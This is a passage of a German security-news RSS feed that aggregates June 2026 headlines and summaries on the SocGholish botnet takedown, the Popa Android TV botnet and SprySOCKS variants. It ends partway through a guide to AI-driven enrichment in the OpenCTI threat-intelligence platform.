<content:encoded><![CDATA[<p>Other noteworthy stories that might have slipped under the radar: Android TV botnet Popa linked to Israeli firm, Velvet Ant maintained decade-long stealth, unpatched GCP Config Connector flaw enables takeover.</p>
<p>The post <a href="https://www.securityweek.com/in-other-news-apple-patches-beats-eavesdropping-flaw-dot-closes-delta-crowdstrike-probe-aws-continuum/">In Other News: Apple Patches Beats Eavesdropping Flaw, DOT Closes Delta CrowdStrike Probe, AWS Continuum</a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[In Other News: Apple Patches Beats Eavesdropping Flaw, DOT Closes Delta CrowdStrike Probe, AWS Continuum]]></title>
<description><![CDATA[Other noteworthy stories that might have slipped under the radar: Android TV botnet Popa linked to Israeli firm, Velvet Ant maintained decade-long stealth, unpatched GCP Config Connector flaw enables takeover. The post In Other News: Apple Patches Beats Eavesdropping Flaw,…
Read more →
The post I...]]></description>
<link>https://tsecurity.de/de/3610780/it-security-nachrichten/in-other-news-apple-patches-beats-eavesdropping-flaw-dot-closes-delta-crowdstrike-probe-aws-continuum/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610780/it-security-nachrichten/in-other-news-apple-patches-beats-eavesdropping-flaw-dot-closes-delta-crowdstrike-probe-aws-continuum/</guid>
<pubDate>Fri, 19 Jun 2026 17:40:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Other noteworthy stories that might have slipped under the radar: Android TV botnet Popa linked to Israeli firm, Velvet Ant maintained decade-long stealth, unpatched GCP Config Connector flaw enables takeover. The post In Other News: Apple Patches Beats Eavesdropping Flaw,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/in-other-news-apple-patches-beats-eavesdropping-flaw-dot-closes-delta-crowdstrike-probe-aws-continuum/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/in-other-news-apple-patches-beats-eavesdropping-flaw-dot-closes-delta-crowdstrike-probe-aws-continuum/">In Other News: Apple Patches Beats Eavesdropping Flaw, DOT Closes Delta CrowdStrike Probe, AWS Continuum</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[15,000 WordPress Websites Cleaned Up in SocGholish Botnet Takedown]]></title>
<description><![CDATA[Law enforcement and private partners took down 106 SocGholish C&C servers and domains as part of Operation Endgame. The post 15,000 WordPress Websites Cleaned Up in SocGholish Botnet Takedown  appeared first on SecurityWeek. This article has been indexed from SecurityWeek…
Read more →
The post 15...]]></description>
<link>https://tsecurity.de/de/3609608/it-security-nachrichten/15000-wordpress-websites-cleaned-up-in-socgholish-botnet-takedown/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609608/it-security-nachrichten/15000-wordpress-websites-cleaned-up-in-socgholish-botnet-takedown/</guid>
<pubDate>Fri, 19 Jun 2026 09:22:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Law enforcement and private partners took down 106 SocGholish C&amp;C servers and domains as part of Operation Endgame. The post 15,000 WordPress Websites Cleaned Up in SocGholish Botnet Takedown  appeared first on SecurityWeek. This article has been indexed from SecurityWeek…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/15000-wordpress-websites-cleaned-up-in-socgholish-botnet-takedown/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/15000-wordpress-websites-cleaned-up-in-socgholish-botnet-takedown/">15,000 WordPress Websites Cleaned Up in SocGholish Botnet Takedown</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Endgame Hits SocGholish Malware Network, 14,971 Websites Cleaned]]></title>
<description><![CDATA[Operation Endgame Hits SocGholish Malware Network after international law enforcement agencies carried out a coordinated operation targeting one of the most significant malware distribution chains linked to cybercrime. Authorities announced the remediation of 14,971 websites infected with SocGhol...]]></description>
<link>https://tsecurity.de/de/3609601/it-security-nachrichten/operation-endgame-hits-socgholish-malware-network-14971-websites-cleaned/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609601/it-security-nachrichten/operation-endgame-hits-socgholish-malware-network-14971-websites-cleaned/</guid>
<pubDate>Fri, 19 Jun 2026 09:22:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1408" height="768" src="https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="SocGholish Malware" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware.webp 1408w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-1024x559.webp 1024w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-750x409.webp 750w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-1140x622.webp 1140w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware.webp 1408w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-1024x559.webp 1024w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-750x409.webp 750w, https://thecyberexpress.com/wp-content/uploads/SocGholish-Malware-1140x622.webp 1140w" sizes="(max-width: 1408px) 100vw, 1408px" title="Operation Endgame Hits SocGholish Malware Network, 14,971 Websites Cleaned 3"></p>Operation Endgame Hits SocGholish Malware Network after international law enforcement agencies carried out a coordinated operation targeting one of the most significant malware distribution chains linked to cybercrime. Authorities announced the remediation of 14,971 websites infected with SocGholish Malware, a threat used by the cybercriminal group <a href="https://thecyberexpress.com/russian-state-linked-evil-corp-sanctioned/" target="_blank" rel="noopener">Evil Corp</a> to gain unauthorized access to victim systems and facilitate further attacks.

The operation involved law enforcement agencies from the <a href="https://thecyberexpress.com/nexperia-security-threat-dutch-government-step/" target="_blank" rel="noopener">Netherlands</a>, Canada, the United States, and Germany, with support from <a href="https://thecyberexpress.com/europol-traces-55-mn-crypto-digital-piracy/" target="_blank" rel="noopener">Europol</a> and Eurojust. Officials described the action as a major disruption of the infrastructure used to distribute malware through compromised <a href="https://thecyberexpress.com/wp-maps-pro-vulnerability/" target="_blank" rel="noopener">WordPress websites</a>.
<h3><strong>Operation Endgame Hits SocGholish Malware Network Across Multiple Countries</strong></h3>
During the coordinated action week, authorities took down 106 servers and domains associated with the criminal infrastructure supporting SocGholish operations.

<a href="https://www.politie.nl/en/news/2026/juni/18/11-international-law-enforcement-initiate-hunt-on-malware-group-socgholish.html" target="_blank" rel="nofollow noopener">According to investigators</a>, SocGholish Malware spreads primarily through compromised WordPress websites. Visitors to infected websites are presented with fake software update prompts, often disguised as browser updates. Once downloaded and installed, the <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-malware/" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28767">malware</a> establishes access to the victim's system, allowing attackers to deploy additional malicious software.

Law enforcement agencies also disabled the SocGholish <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-botnet/" target="_blank" rel="noopener" title="Botnet" data-wpil-keyword-link="linked" data-wpil-monitor-id="28769">Botnet</a> by seizing domains and taking servers offline.

In addition to infrastructure takedowns, authorities cleaned infected WordPress sites and launched a large-scale victim notification campaign to warn affected website owners and encourage stronger security measures.
<h3><strong>WordPress Websites at the Center of the Campaign</strong></h3>
Authorities highlighted the widespread use of WordPress as a factor contributing to the scale of the threat. According to WordPress, more than 43% of websites worldwide are built on the platform.

Investigators reported that login credentials for approximately 1.4 million websites have been leaked, increasing the <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risk" data-wpil-keyword-link="linked" data-wpil-monitor-id="28771">risk</a> of unauthorized access and malware infections.

Cybercriminals behind SocGholish typically compromise websites by exploiting weak passwords, stolen credentials, or vulnerable website configurations. Once access is obtained, malicious code is inserted into websites, allowing attackers to distribute fake updates to visitors.

The infected websites included platforms providing everyday services, such as restaurants and automotive repair businesses.
<h3><strong>Authorities Urge Website Owners to Strengthen Security</strong></h3>
The Dutch National High Tech <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28766">Crime</a> Unit stated that malware and backdoors have been removed from affected websites and that site owners have been notified.

Website owners have been urged to:
<ul>
 	<li>Change login credentials</li>
 	<li>Enable <a href="https://thecyberexpress.com/cybersecurity-awareness-month-what-is-2fa-mfa-and-why-should-you-care/" rel="nofollow">Multi-Factor Authentication (MFA)</a></li>
 	<li>Remove unknown WordPress accounts</li>
 	<li>Keep WordPress installations updated</li>
</ul>
Authorities emphasized that these measures can significantly reduce the likelihood of future compromise.
<h3><strong>Fake Updates Continue to Drive Infections</strong></h3>
Also known as <strong>FakeUpdates</strong>, SocGholish has remained active since 2017 and continues to be used as an initial access tool for broader cybercriminal operations.

The <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-malware/" target="_blank" rel="noopener" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28773">malware</a> is distributed through fraudulent software update messages that appear while users browse compromised websites. Once installed, the malware creates a connection to attackers, enabling them to gain access to victim systems.

Officials warned users not to trust browser pop-ups requesting immediate software updates and advised obtaining updates only through official application stores, system settings, or verified vendors.

Additional recommendations include maintaining updated antivirus software and exercising caution when encountering urgent update notifications.

Law enforcement agencies linked Evil Corp to the SocGholish malware operation. The group has previously been associated with Zeus and Dridex malware campaigns, as well as multiple <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noopener" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28768">ransomware</a> and money laundering operations.

Authorities noted that SocGholish has been used to deploy various <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-ransomware-how-it-work/" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28772">ransomware</a> strains that have impacted organizations and critical infrastructure targets worldwide.
<h3><strong>Operation Endgame Expands Global Cybercrime Disruption Efforts</strong></h3>
Launched in 2024, Operation Endgame is described by participating agencies as the largest international effort to combat ransomware and <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28770">cybercrime</a>. The initiative brings together law enforcement and judicial authorities from the Netherlands, Germany, Denmark, the United States, Australia, France, Belgium, the United Kingdom, and Canada, with support from Europol and Eurojust.

Officials stated that cooperation between public agencies and private-sector <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28765">cybersecurity</a> organizations remains a critical component of the operation as efforts continue against SocGholish and other cybercriminal networks.]]></content:encoded>
</item>
<item>
<title><![CDATA[15,000 WordPress Websites Cleaned Up in SocGholish Botnet Takedown ]]></title>
<description><![CDATA[Law enforcement and private partners took down 106 SocGholish C&C servers and domains as part of Operation Endgame.
The post 15,000 WordPress Websites Cleaned Up in SocGholish Botnet Takedown  appeared first on SecurityWeek.]]></description>
<link>https://tsecurity.de/de/3609557/it-security-nachrichten/15000-wordpress-websites-cleaned-up-in-socgholish-botnet-takedown/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609557/it-security-nachrichten/15000-wordpress-websites-cleaned-up-in-socgholish-botnet-takedown/</guid>
<pubDate>Fri, 19 Jun 2026 08:52:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Law enforcement and private partners took down 106 SocGholish C&amp;C servers and domains as part of Operation Endgame.</p>
<p>The post <a href="https://www.securityweek.com/15000-wordpress-websites-cleaned-up-in-socgholish-botnet-takedown/">15,000 WordPress Websites Cleaned Up in SocGholish Botnet Takedown </a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[6/18/2026]]></title>
<description><![CDATA[Bulgaria Allowed Surveillance Tech Firm to Sell Products to Repressive Regimes How Hackers Found a Back Door Into the American Living RoomThe Midterms Are Going to Be a Data Security NightmareKrebs: ‘Popa’ Botnet Linked to Publicly-Traded Israeli Firm Israeli Cyber Startup Dream Raises $260 Milli...]]></description>
<link>https://tsecurity.de/de/3609272/it-security-nachrichten/6182026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609272/it-security-nachrichten/6182026/</guid>
<pubDate>Fri, 19 Jun 2026 04:37:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Bulgaria Allowed Surveillance Tech Firm to Sell Products to Repressive Regimes How Hackers Found a Back Door Into the American Living RoomThe Midterms Are Going to Be a Data Security NightmareKrebs: ‘Popa’ Botnet Linked to Publicly-Traded Israeli Firm Israeli Cyber Startup Dream Raises $260 Million, Valued at $3 BillionAccenture Takes Majority Stake in Cyber Company … <a href="https://thecyberbeat.com/2026/06/19/6-18-2026/" class="more-link">Continue reading <span class="screen-reader-text">6/18/2026</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Authorities disrupt Evil Corp’s SocGholish botnet]]></title>
<description><![CDATA[Cybersecurity firms, researchers and officials took down 106 servers and remediated nearly 15,000 sites that were infected with the malware.
The post Authorities disrupt Evil Corp’s SocGholish botnet appeared first on CyberScoop.]]></description>
<link>https://tsecurity.de/de/3609052/it-security-nachrichten/authorities-disrupt-evil-corps-socgholish-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609052/it-security-nachrichten/authorities-disrupt-evil-corps-socgholish-botnet/</guid>
<pubDate>Fri, 19 Jun 2026 00:38:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity firms, researchers and officials took down 106 servers and remediated nearly 15,000 sites that were infected with the malware.</p>
<p>The post <a href="https://cyberscoop.com/socgholish-malware-botnet-takedown-evilcorp/">Authorities disrupt Evil Corp’s SocGholish botnet</a> appeared first on <a href="https://cyberscoop.com/">CyberScoop</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The botnet browser blues.]]></title>
<description><![CDATA[International law enforcement disrupts the SocGholish botnet. The UK’s cyber chief says cybersecurity is a contest, not a risk register. Ukraine joins the EU’s cyber reserve. The Gentlemen gang sharpens its ransomware toolkit. A WordPress supply chain attack spreads malware. Critical patches land...]]></description>
<link>https://tsecurity.de/de/3608899/it-security-nachrichten/the-botnet-browser-blues/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608899/it-security-nachrichten/the-botnet-browser-blues/</guid>
<pubDate>Thu, 18 Jun 2026 22:37:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[International law enforcement disrupts the SocGholish botnet. The UK’s cyber chief says cybersecurity is a contest, not a risk register. Ukraine joins the EU’s cyber reserve. The Gentlemen gang sharpens its ransomware toolkit. A WordPress supply chain attack spreads malware. Critical patches land from F5, Atlassian, and Splunk. Agentjacking targets AI coding assistants. And Kodak confirms a breach claimed by ShinyHunters. Our guest is Ben Yelin from University of Maryland Center for Cyber Health and Hazard Strategies on the failure of FISA section 702 to reauthorize. Criminal coders face automation anxiety.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Popa’ Botnet Linked to Publicly-Traded Israeli Firm]]></title>
<description><![CDATA[For the past four years, a sprawling Android-based botnet called Popa has forced millions of consumer TV boxes to relay Internet traffic linked to advertising fraud, account takeovers, and mass data-scraping efforts. This week, researchers from multiple security firms concluded…
Read more →
The p...]]></description>
<link>https://tsecurity.de/de/3608652/it-security-nachrichten/popa-botnet-linked-to-publicly-traded-israeli-firm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608652/it-security-nachrichten/popa-botnet-linked-to-publicly-traded-israeli-firm/</guid>
<pubDate>Thu, 18 Jun 2026 20:20:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>For the past four years, a sprawling Android-based botnet called Popa has forced millions of consumer TV boxes to relay Internet traffic linked to advertising fraud, account takeovers, and mass data-scraping efforts. This week, researchers from multiple security firms concluded…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/popa-botnet-linked-to-publicly-traded-israeli-firm/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/popa-botnet-linked-to-publicly-traded-israeli-firm/">‘Popa’ Botnet Linked to Publicly-Traded Israeli Firm</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Popa’ Botnet Linked to Publicly-Traded Israeli Firm]]></title>
<description><![CDATA[For the past four years, a sprawling Android-based botnet called Popa has forced millions of consumer TV boxes to relay Internet traffic linked to advertising fraud, account takeovers, and mass data-scraping efforts. This week, researchers from multiple security firms concluded that the Popa botn...]]></description>
<link>https://tsecurity.de/de/3608590/it-security-nachrichten/popa-botnet-linked-to-publicly-traded-israeli-firm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608590/it-security-nachrichten/popa-botnet-linked-to-publicly-traded-israeli-firm/</guid>
<pubDate>Thu, 18 Jun 2026 19:53:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[For the past four years, a sprawling Android-based botnet called Popa has forced millions of consumer TV boxes to relay Internet traffic linked to advertising fraud, account takeovers, and mass data-scraping efforts. This week, researchers from multiple security firms concluded that the Popa botnet is linked to NetNut, a "residential proxy" provider operated by the publicly-traded Israeli firm Alarum Technologies Ltd [NASDAQ: ALAR].]]></content:encoded>
</item>
<item>
<title><![CDATA[Police cleans nearly 15,000 SocGholish-infected sites tied to Evil Corp]]></title>
<description><![CDATA[International law enforcement agencies cleaned nearly 15,000 malware-infected WordPress websites and took down more than 100 servers linked to the SocGholish botnet and the Evil Corp Russian cybercrime group. [...]]]></description>
<link>https://tsecurity.de/de/3607949/it-security-nachrichten/police-cleans-nearly-15000-socgholish-infected-sites-tied-to-evil-corp/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607949/it-security-nachrichten/police-cleans-nearly-15000-socgholish-infected-sites-tied-to-evil-corp/</guid>
<pubDate>Thu, 18 Jun 2026 15:38:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[International law enforcement agencies cleaned nearly 15,000 malware-infected WordPress websites and took down more than 100 servers linked to the SocGholish botnet and the Evil Corp Russian cybercrime group. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Endgame: Ermittler säubern tausende Blogs von SocGholish]]></title>
<description><![CDATA[Strafverfolger aus vier Ländern zerschlugen ein Botnet und Wordpress-Blogs, die Kriminelle als Verteilstationen für Schadsoftware mißbrauchten.]]></description>
<link>https://tsecurity.de/de/3607940/it-nachrichten/operation-endgame-ermittler-saeubern-tausende-blogs-von-socgholish/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607940/it-nachrichten/operation-endgame-ermittler-saeubern-tausende-blogs-von-socgholish/</guid>
<pubDate>Thu, 18 Jun 2026 15:32:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Strafverfolger aus vier Ländern zerschlugen ein Botnet und Wordpress-Blogs, die Kriminelle als Verteilstationen für Schadsoftware mißbrauchten.]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Endgame: Ermittler säubern tausende Blogs von SocGholish]]></title>
<description><![CDATA[Strafverfolger aus vier Ländern zerschlugen ein Botnet und Wordpress-Blogs, die Kriminelle als Verteilstationen für Schadsoftware mißbrauchten.]]></description>
<link>https://tsecurity.de/de/3607914/it-security-nachrichten/operation-endgame-ermittler-saeubern-tausende-blogs-von-socgholish/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607914/it-security-nachrichten/operation-endgame-ermittler-saeubern-tausende-blogs-von-socgholish/</guid>
<pubDate>Thu, 18 Jun 2026 15:24:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Strafverfolger aus vier Ländern zerschlugen ein Botnet und Wordpress-Blogs, die Kriminelle als Verteilstationen für Schadsoftware mißbrauchten.]]></content:encoded>
</item>
<item>
<title><![CDATA[SprySOCKS-Botnet-Backdoor: neue Windows-Varianten mit Kernel-Stealth]]></title>
<description><![CDATA[SLOWAKEI / LONDON (IT BOLTWISE) – Sicherheitsforscher melden zwei neue Windows-Varianten eines bislang vor allem als Linux-Backdoor bekannten Systems: WIN_DRV und WIN_PLUS. Auffällig ist die driverbasierte Tarnung im Betriebssystem sowie ein modulartes Vorgehen über Print-Spooler und DLL-Sideload...]]></description>
<link>https://tsecurity.de/de/3601852/it-security-nachrichten/sprysocks-botnet-backdoor-neue-windows-varianten-mit-kernel-stealth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601852/it-security-nachrichten/sprysocks-botnet-backdoor-neue-windows-varianten-mit-kernel-stealth/</guid>
<pubDate>Tue, 16 Jun 2026 14:52:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sprysocks-windows-kernel-stealth.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sprysocks-windows-kernel-stealth.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sprysocks-windows-kernel-stealth-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sprysocks-windows-kernel-stealth-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sprysocks-windows-kernel-stealth-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sprysocks-windows-kernel-stealth-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sprysocks-windows-kernel-stealth-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">SLOWAKEI / LONDON (IT BOLTWISE) – Sicherheitsforscher melden zwei neue Windows-Varianten eines bislang vor allem als Linux-Backdoor bekannten Systems: WIN_DRV und WIN_PLUS. Auffällig ist die driverbasierte Tarnung im Betriebssystem sowie ein modulartes Vorgehen über Print-Spooler und DLL-Sideloading. Damit erweitert die Kampagne plattformübergreifend ihre Reichweite – und erhöht den Aufwand für Erkennung und Incident Response in […]</p>
<div><a href="https://www.it-boltwise.de/sprysocks-botnet-backdoor-neue-windows-varianten-mit-kernel-stealth.html">... den vollständigen Artikel <strong>»SprySOCKS-Botnet-Backdoor: neue Windows-Varianten mit Kernel-Stealth«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/sprysocks-botnet-backdoor-neue-windows-varianten-mit-kernel-stealth.html">SprySOCKS-Botnet-Backdoor: neue Windows-Varianten mit Kernel-Stealth</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Intelligent Shield. OpenCTI]]></title>
<description><![CDATA[Beyond Ingestion Subtitle: Deploying AI-Driven Enrichment in OpenCTITransforming Threat Data into High-Confidence IntelligenceIn an era of relentless and complex cyber attacks, traditional, manual threat intelligence cannot keep pace. Security teams are overwhelmed by data fragmentation and the c...]]></description>
<link>https://tsecurity.de/de/3600900/hacking/the-intelligent-shield-opencti/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600900/hacking/the-intelligent-shield-opencti/</guid>
<pubDate>Tue, 16 Jun 2026 09:09:15 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Beyond Ingestion <strong>Subtitle:</strong> Deploying AI-Driven Enrichment in OpenCTI</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yZJrYF0KW4x5gzDg6xNN6A.png"></figure><h3>Transforming Threat Data into High-Confidence Intelligence</h3><p>In an era of relentless and complex cyber attacks, traditional, manual threat intelligence cannot keep pace. Security teams are overwhelmed by data fragmentation and the critical lack of context. “The Intelligent Shield” introduces a new paradigm: beyond simply ingesting data, it’s about deploying advanced, automated machine learning pipelines for <strong>AI-driven enrichment.</strong></p><p>This guide demonstrates how to integrate state-of-the-art Large Language Models (LLMs), such as <strong>Claude AI</strong>, into an <strong>OpenCTI</strong> ecosystem. By leveraging the <strong>OpenCTI STIX 2.1 Knowledge Graph</strong> and natural language processing, this architecture converts disparate, unstructured data feeds into high-fidelity, actionable intelligence. It automatically builds context, executes deep mapping to frameworks like the <strong>MITRE ATT&amp;CK Matrix</strong>, and generates calculated, real-time <strong>Confidence Scores</strong>, enabling organizations to proactively strengthen their defenses with an intuitive, automated <strong>Intelligent Shield.</strong></p><h3>Table of Contents</h3><ol><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#6e45"><strong>What is OpenCTI?</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#8ff6"><strong>Core Capabilities</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7dc1"><strong>Architecture Overview</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7865"><strong>Threat Intelligence Feeds</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#fe8e"><strong>AI Integration Layer</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#c6df"><strong>Prerequisites</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7c94"><strong>Docker Compose Deployment</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#b276"><strong>Connector Configuration</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#a2bd"><strong>AI-Driven Enrichment Pipeline</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#99be"><strong>Post-Deployment Hardening</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#fd26"><strong>Operational Runbook</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#aabb"><strong>Troubleshooting</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7e3e"><strong>Usage Examples</strong></a></li></ol><h3>1. What is OpenCTI?</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fSYjMAN2q5yyUccU6F6daQ.png"></figure><p><strong>OpenCTI</strong> (Open Cyber Threat Intelligence) is an open-source platform developed by Filigran (formerly a project of ANSSI, the French national cybersecurity agency) for structuring, storing, organizing, visualizing, and sharing cyber threat intelligence (CTI).</p><p>It implements the <strong>STIX 2.1</strong> (Structured Threat Information eXpression) standard as its native data model and exposes a <strong>GraphQL API</strong> for all read/write operations. Every object — threat actors, campaigns, malware, vulnerabilities, indicators, attack patterns — is stored as a STIX Domain Object (SDO) or STIX Relationship Object (SRO) backed by two databases:</p><ul><li><strong>ElasticSearch / OpenSearch</strong> — full-text search and analytics</li><li><strong>Apache Cassandra (via JanusGraph)</strong> — graph relationship storage</li></ul><h3>Why OpenCTI?</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1a3jOT66dfRuy3XvkQJ5NQ.png"></figure><h3>2. Core Capabilities</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uj2dA3oWyo03XyrbjkNrGg.png"></figure><h4>2.1 Knowledge Graph</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YvoudJ_c2ItEwEgTZ8TGaQ.png"></figure><ul><li>Entities: Threat Actors, Intrusion Sets, Campaigns, Malware, Tools, Vulnerabilities (CVE), Attack Patterns (MITRE ATT&amp;CK), Courses of Action, Sectors, Countries, Organizations</li><li>Relationships modelled as first-class STIX SROs with confidence scores, date ranges, and TLP markings</li><li>Diamond Model and Kill Chain views built in</li></ul><h4>2.2 Indicator Management</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pGfNRDKffBczwNJeMydW8w.png"></figure><ul><li>IOC lifecycle: valid_from / valid_until with automatic expiry</li><li>Detection rule generation (Sigma, YARA, Snort)</li><li>Bulk import via STIX, CSV, OpenIOC, MISP formats</li><li>Scoring and confidence weighting per source</li></ul><h4>2.3 MITRE ATT&amp;CK Navigator Integration</h4><figure><img alt="" 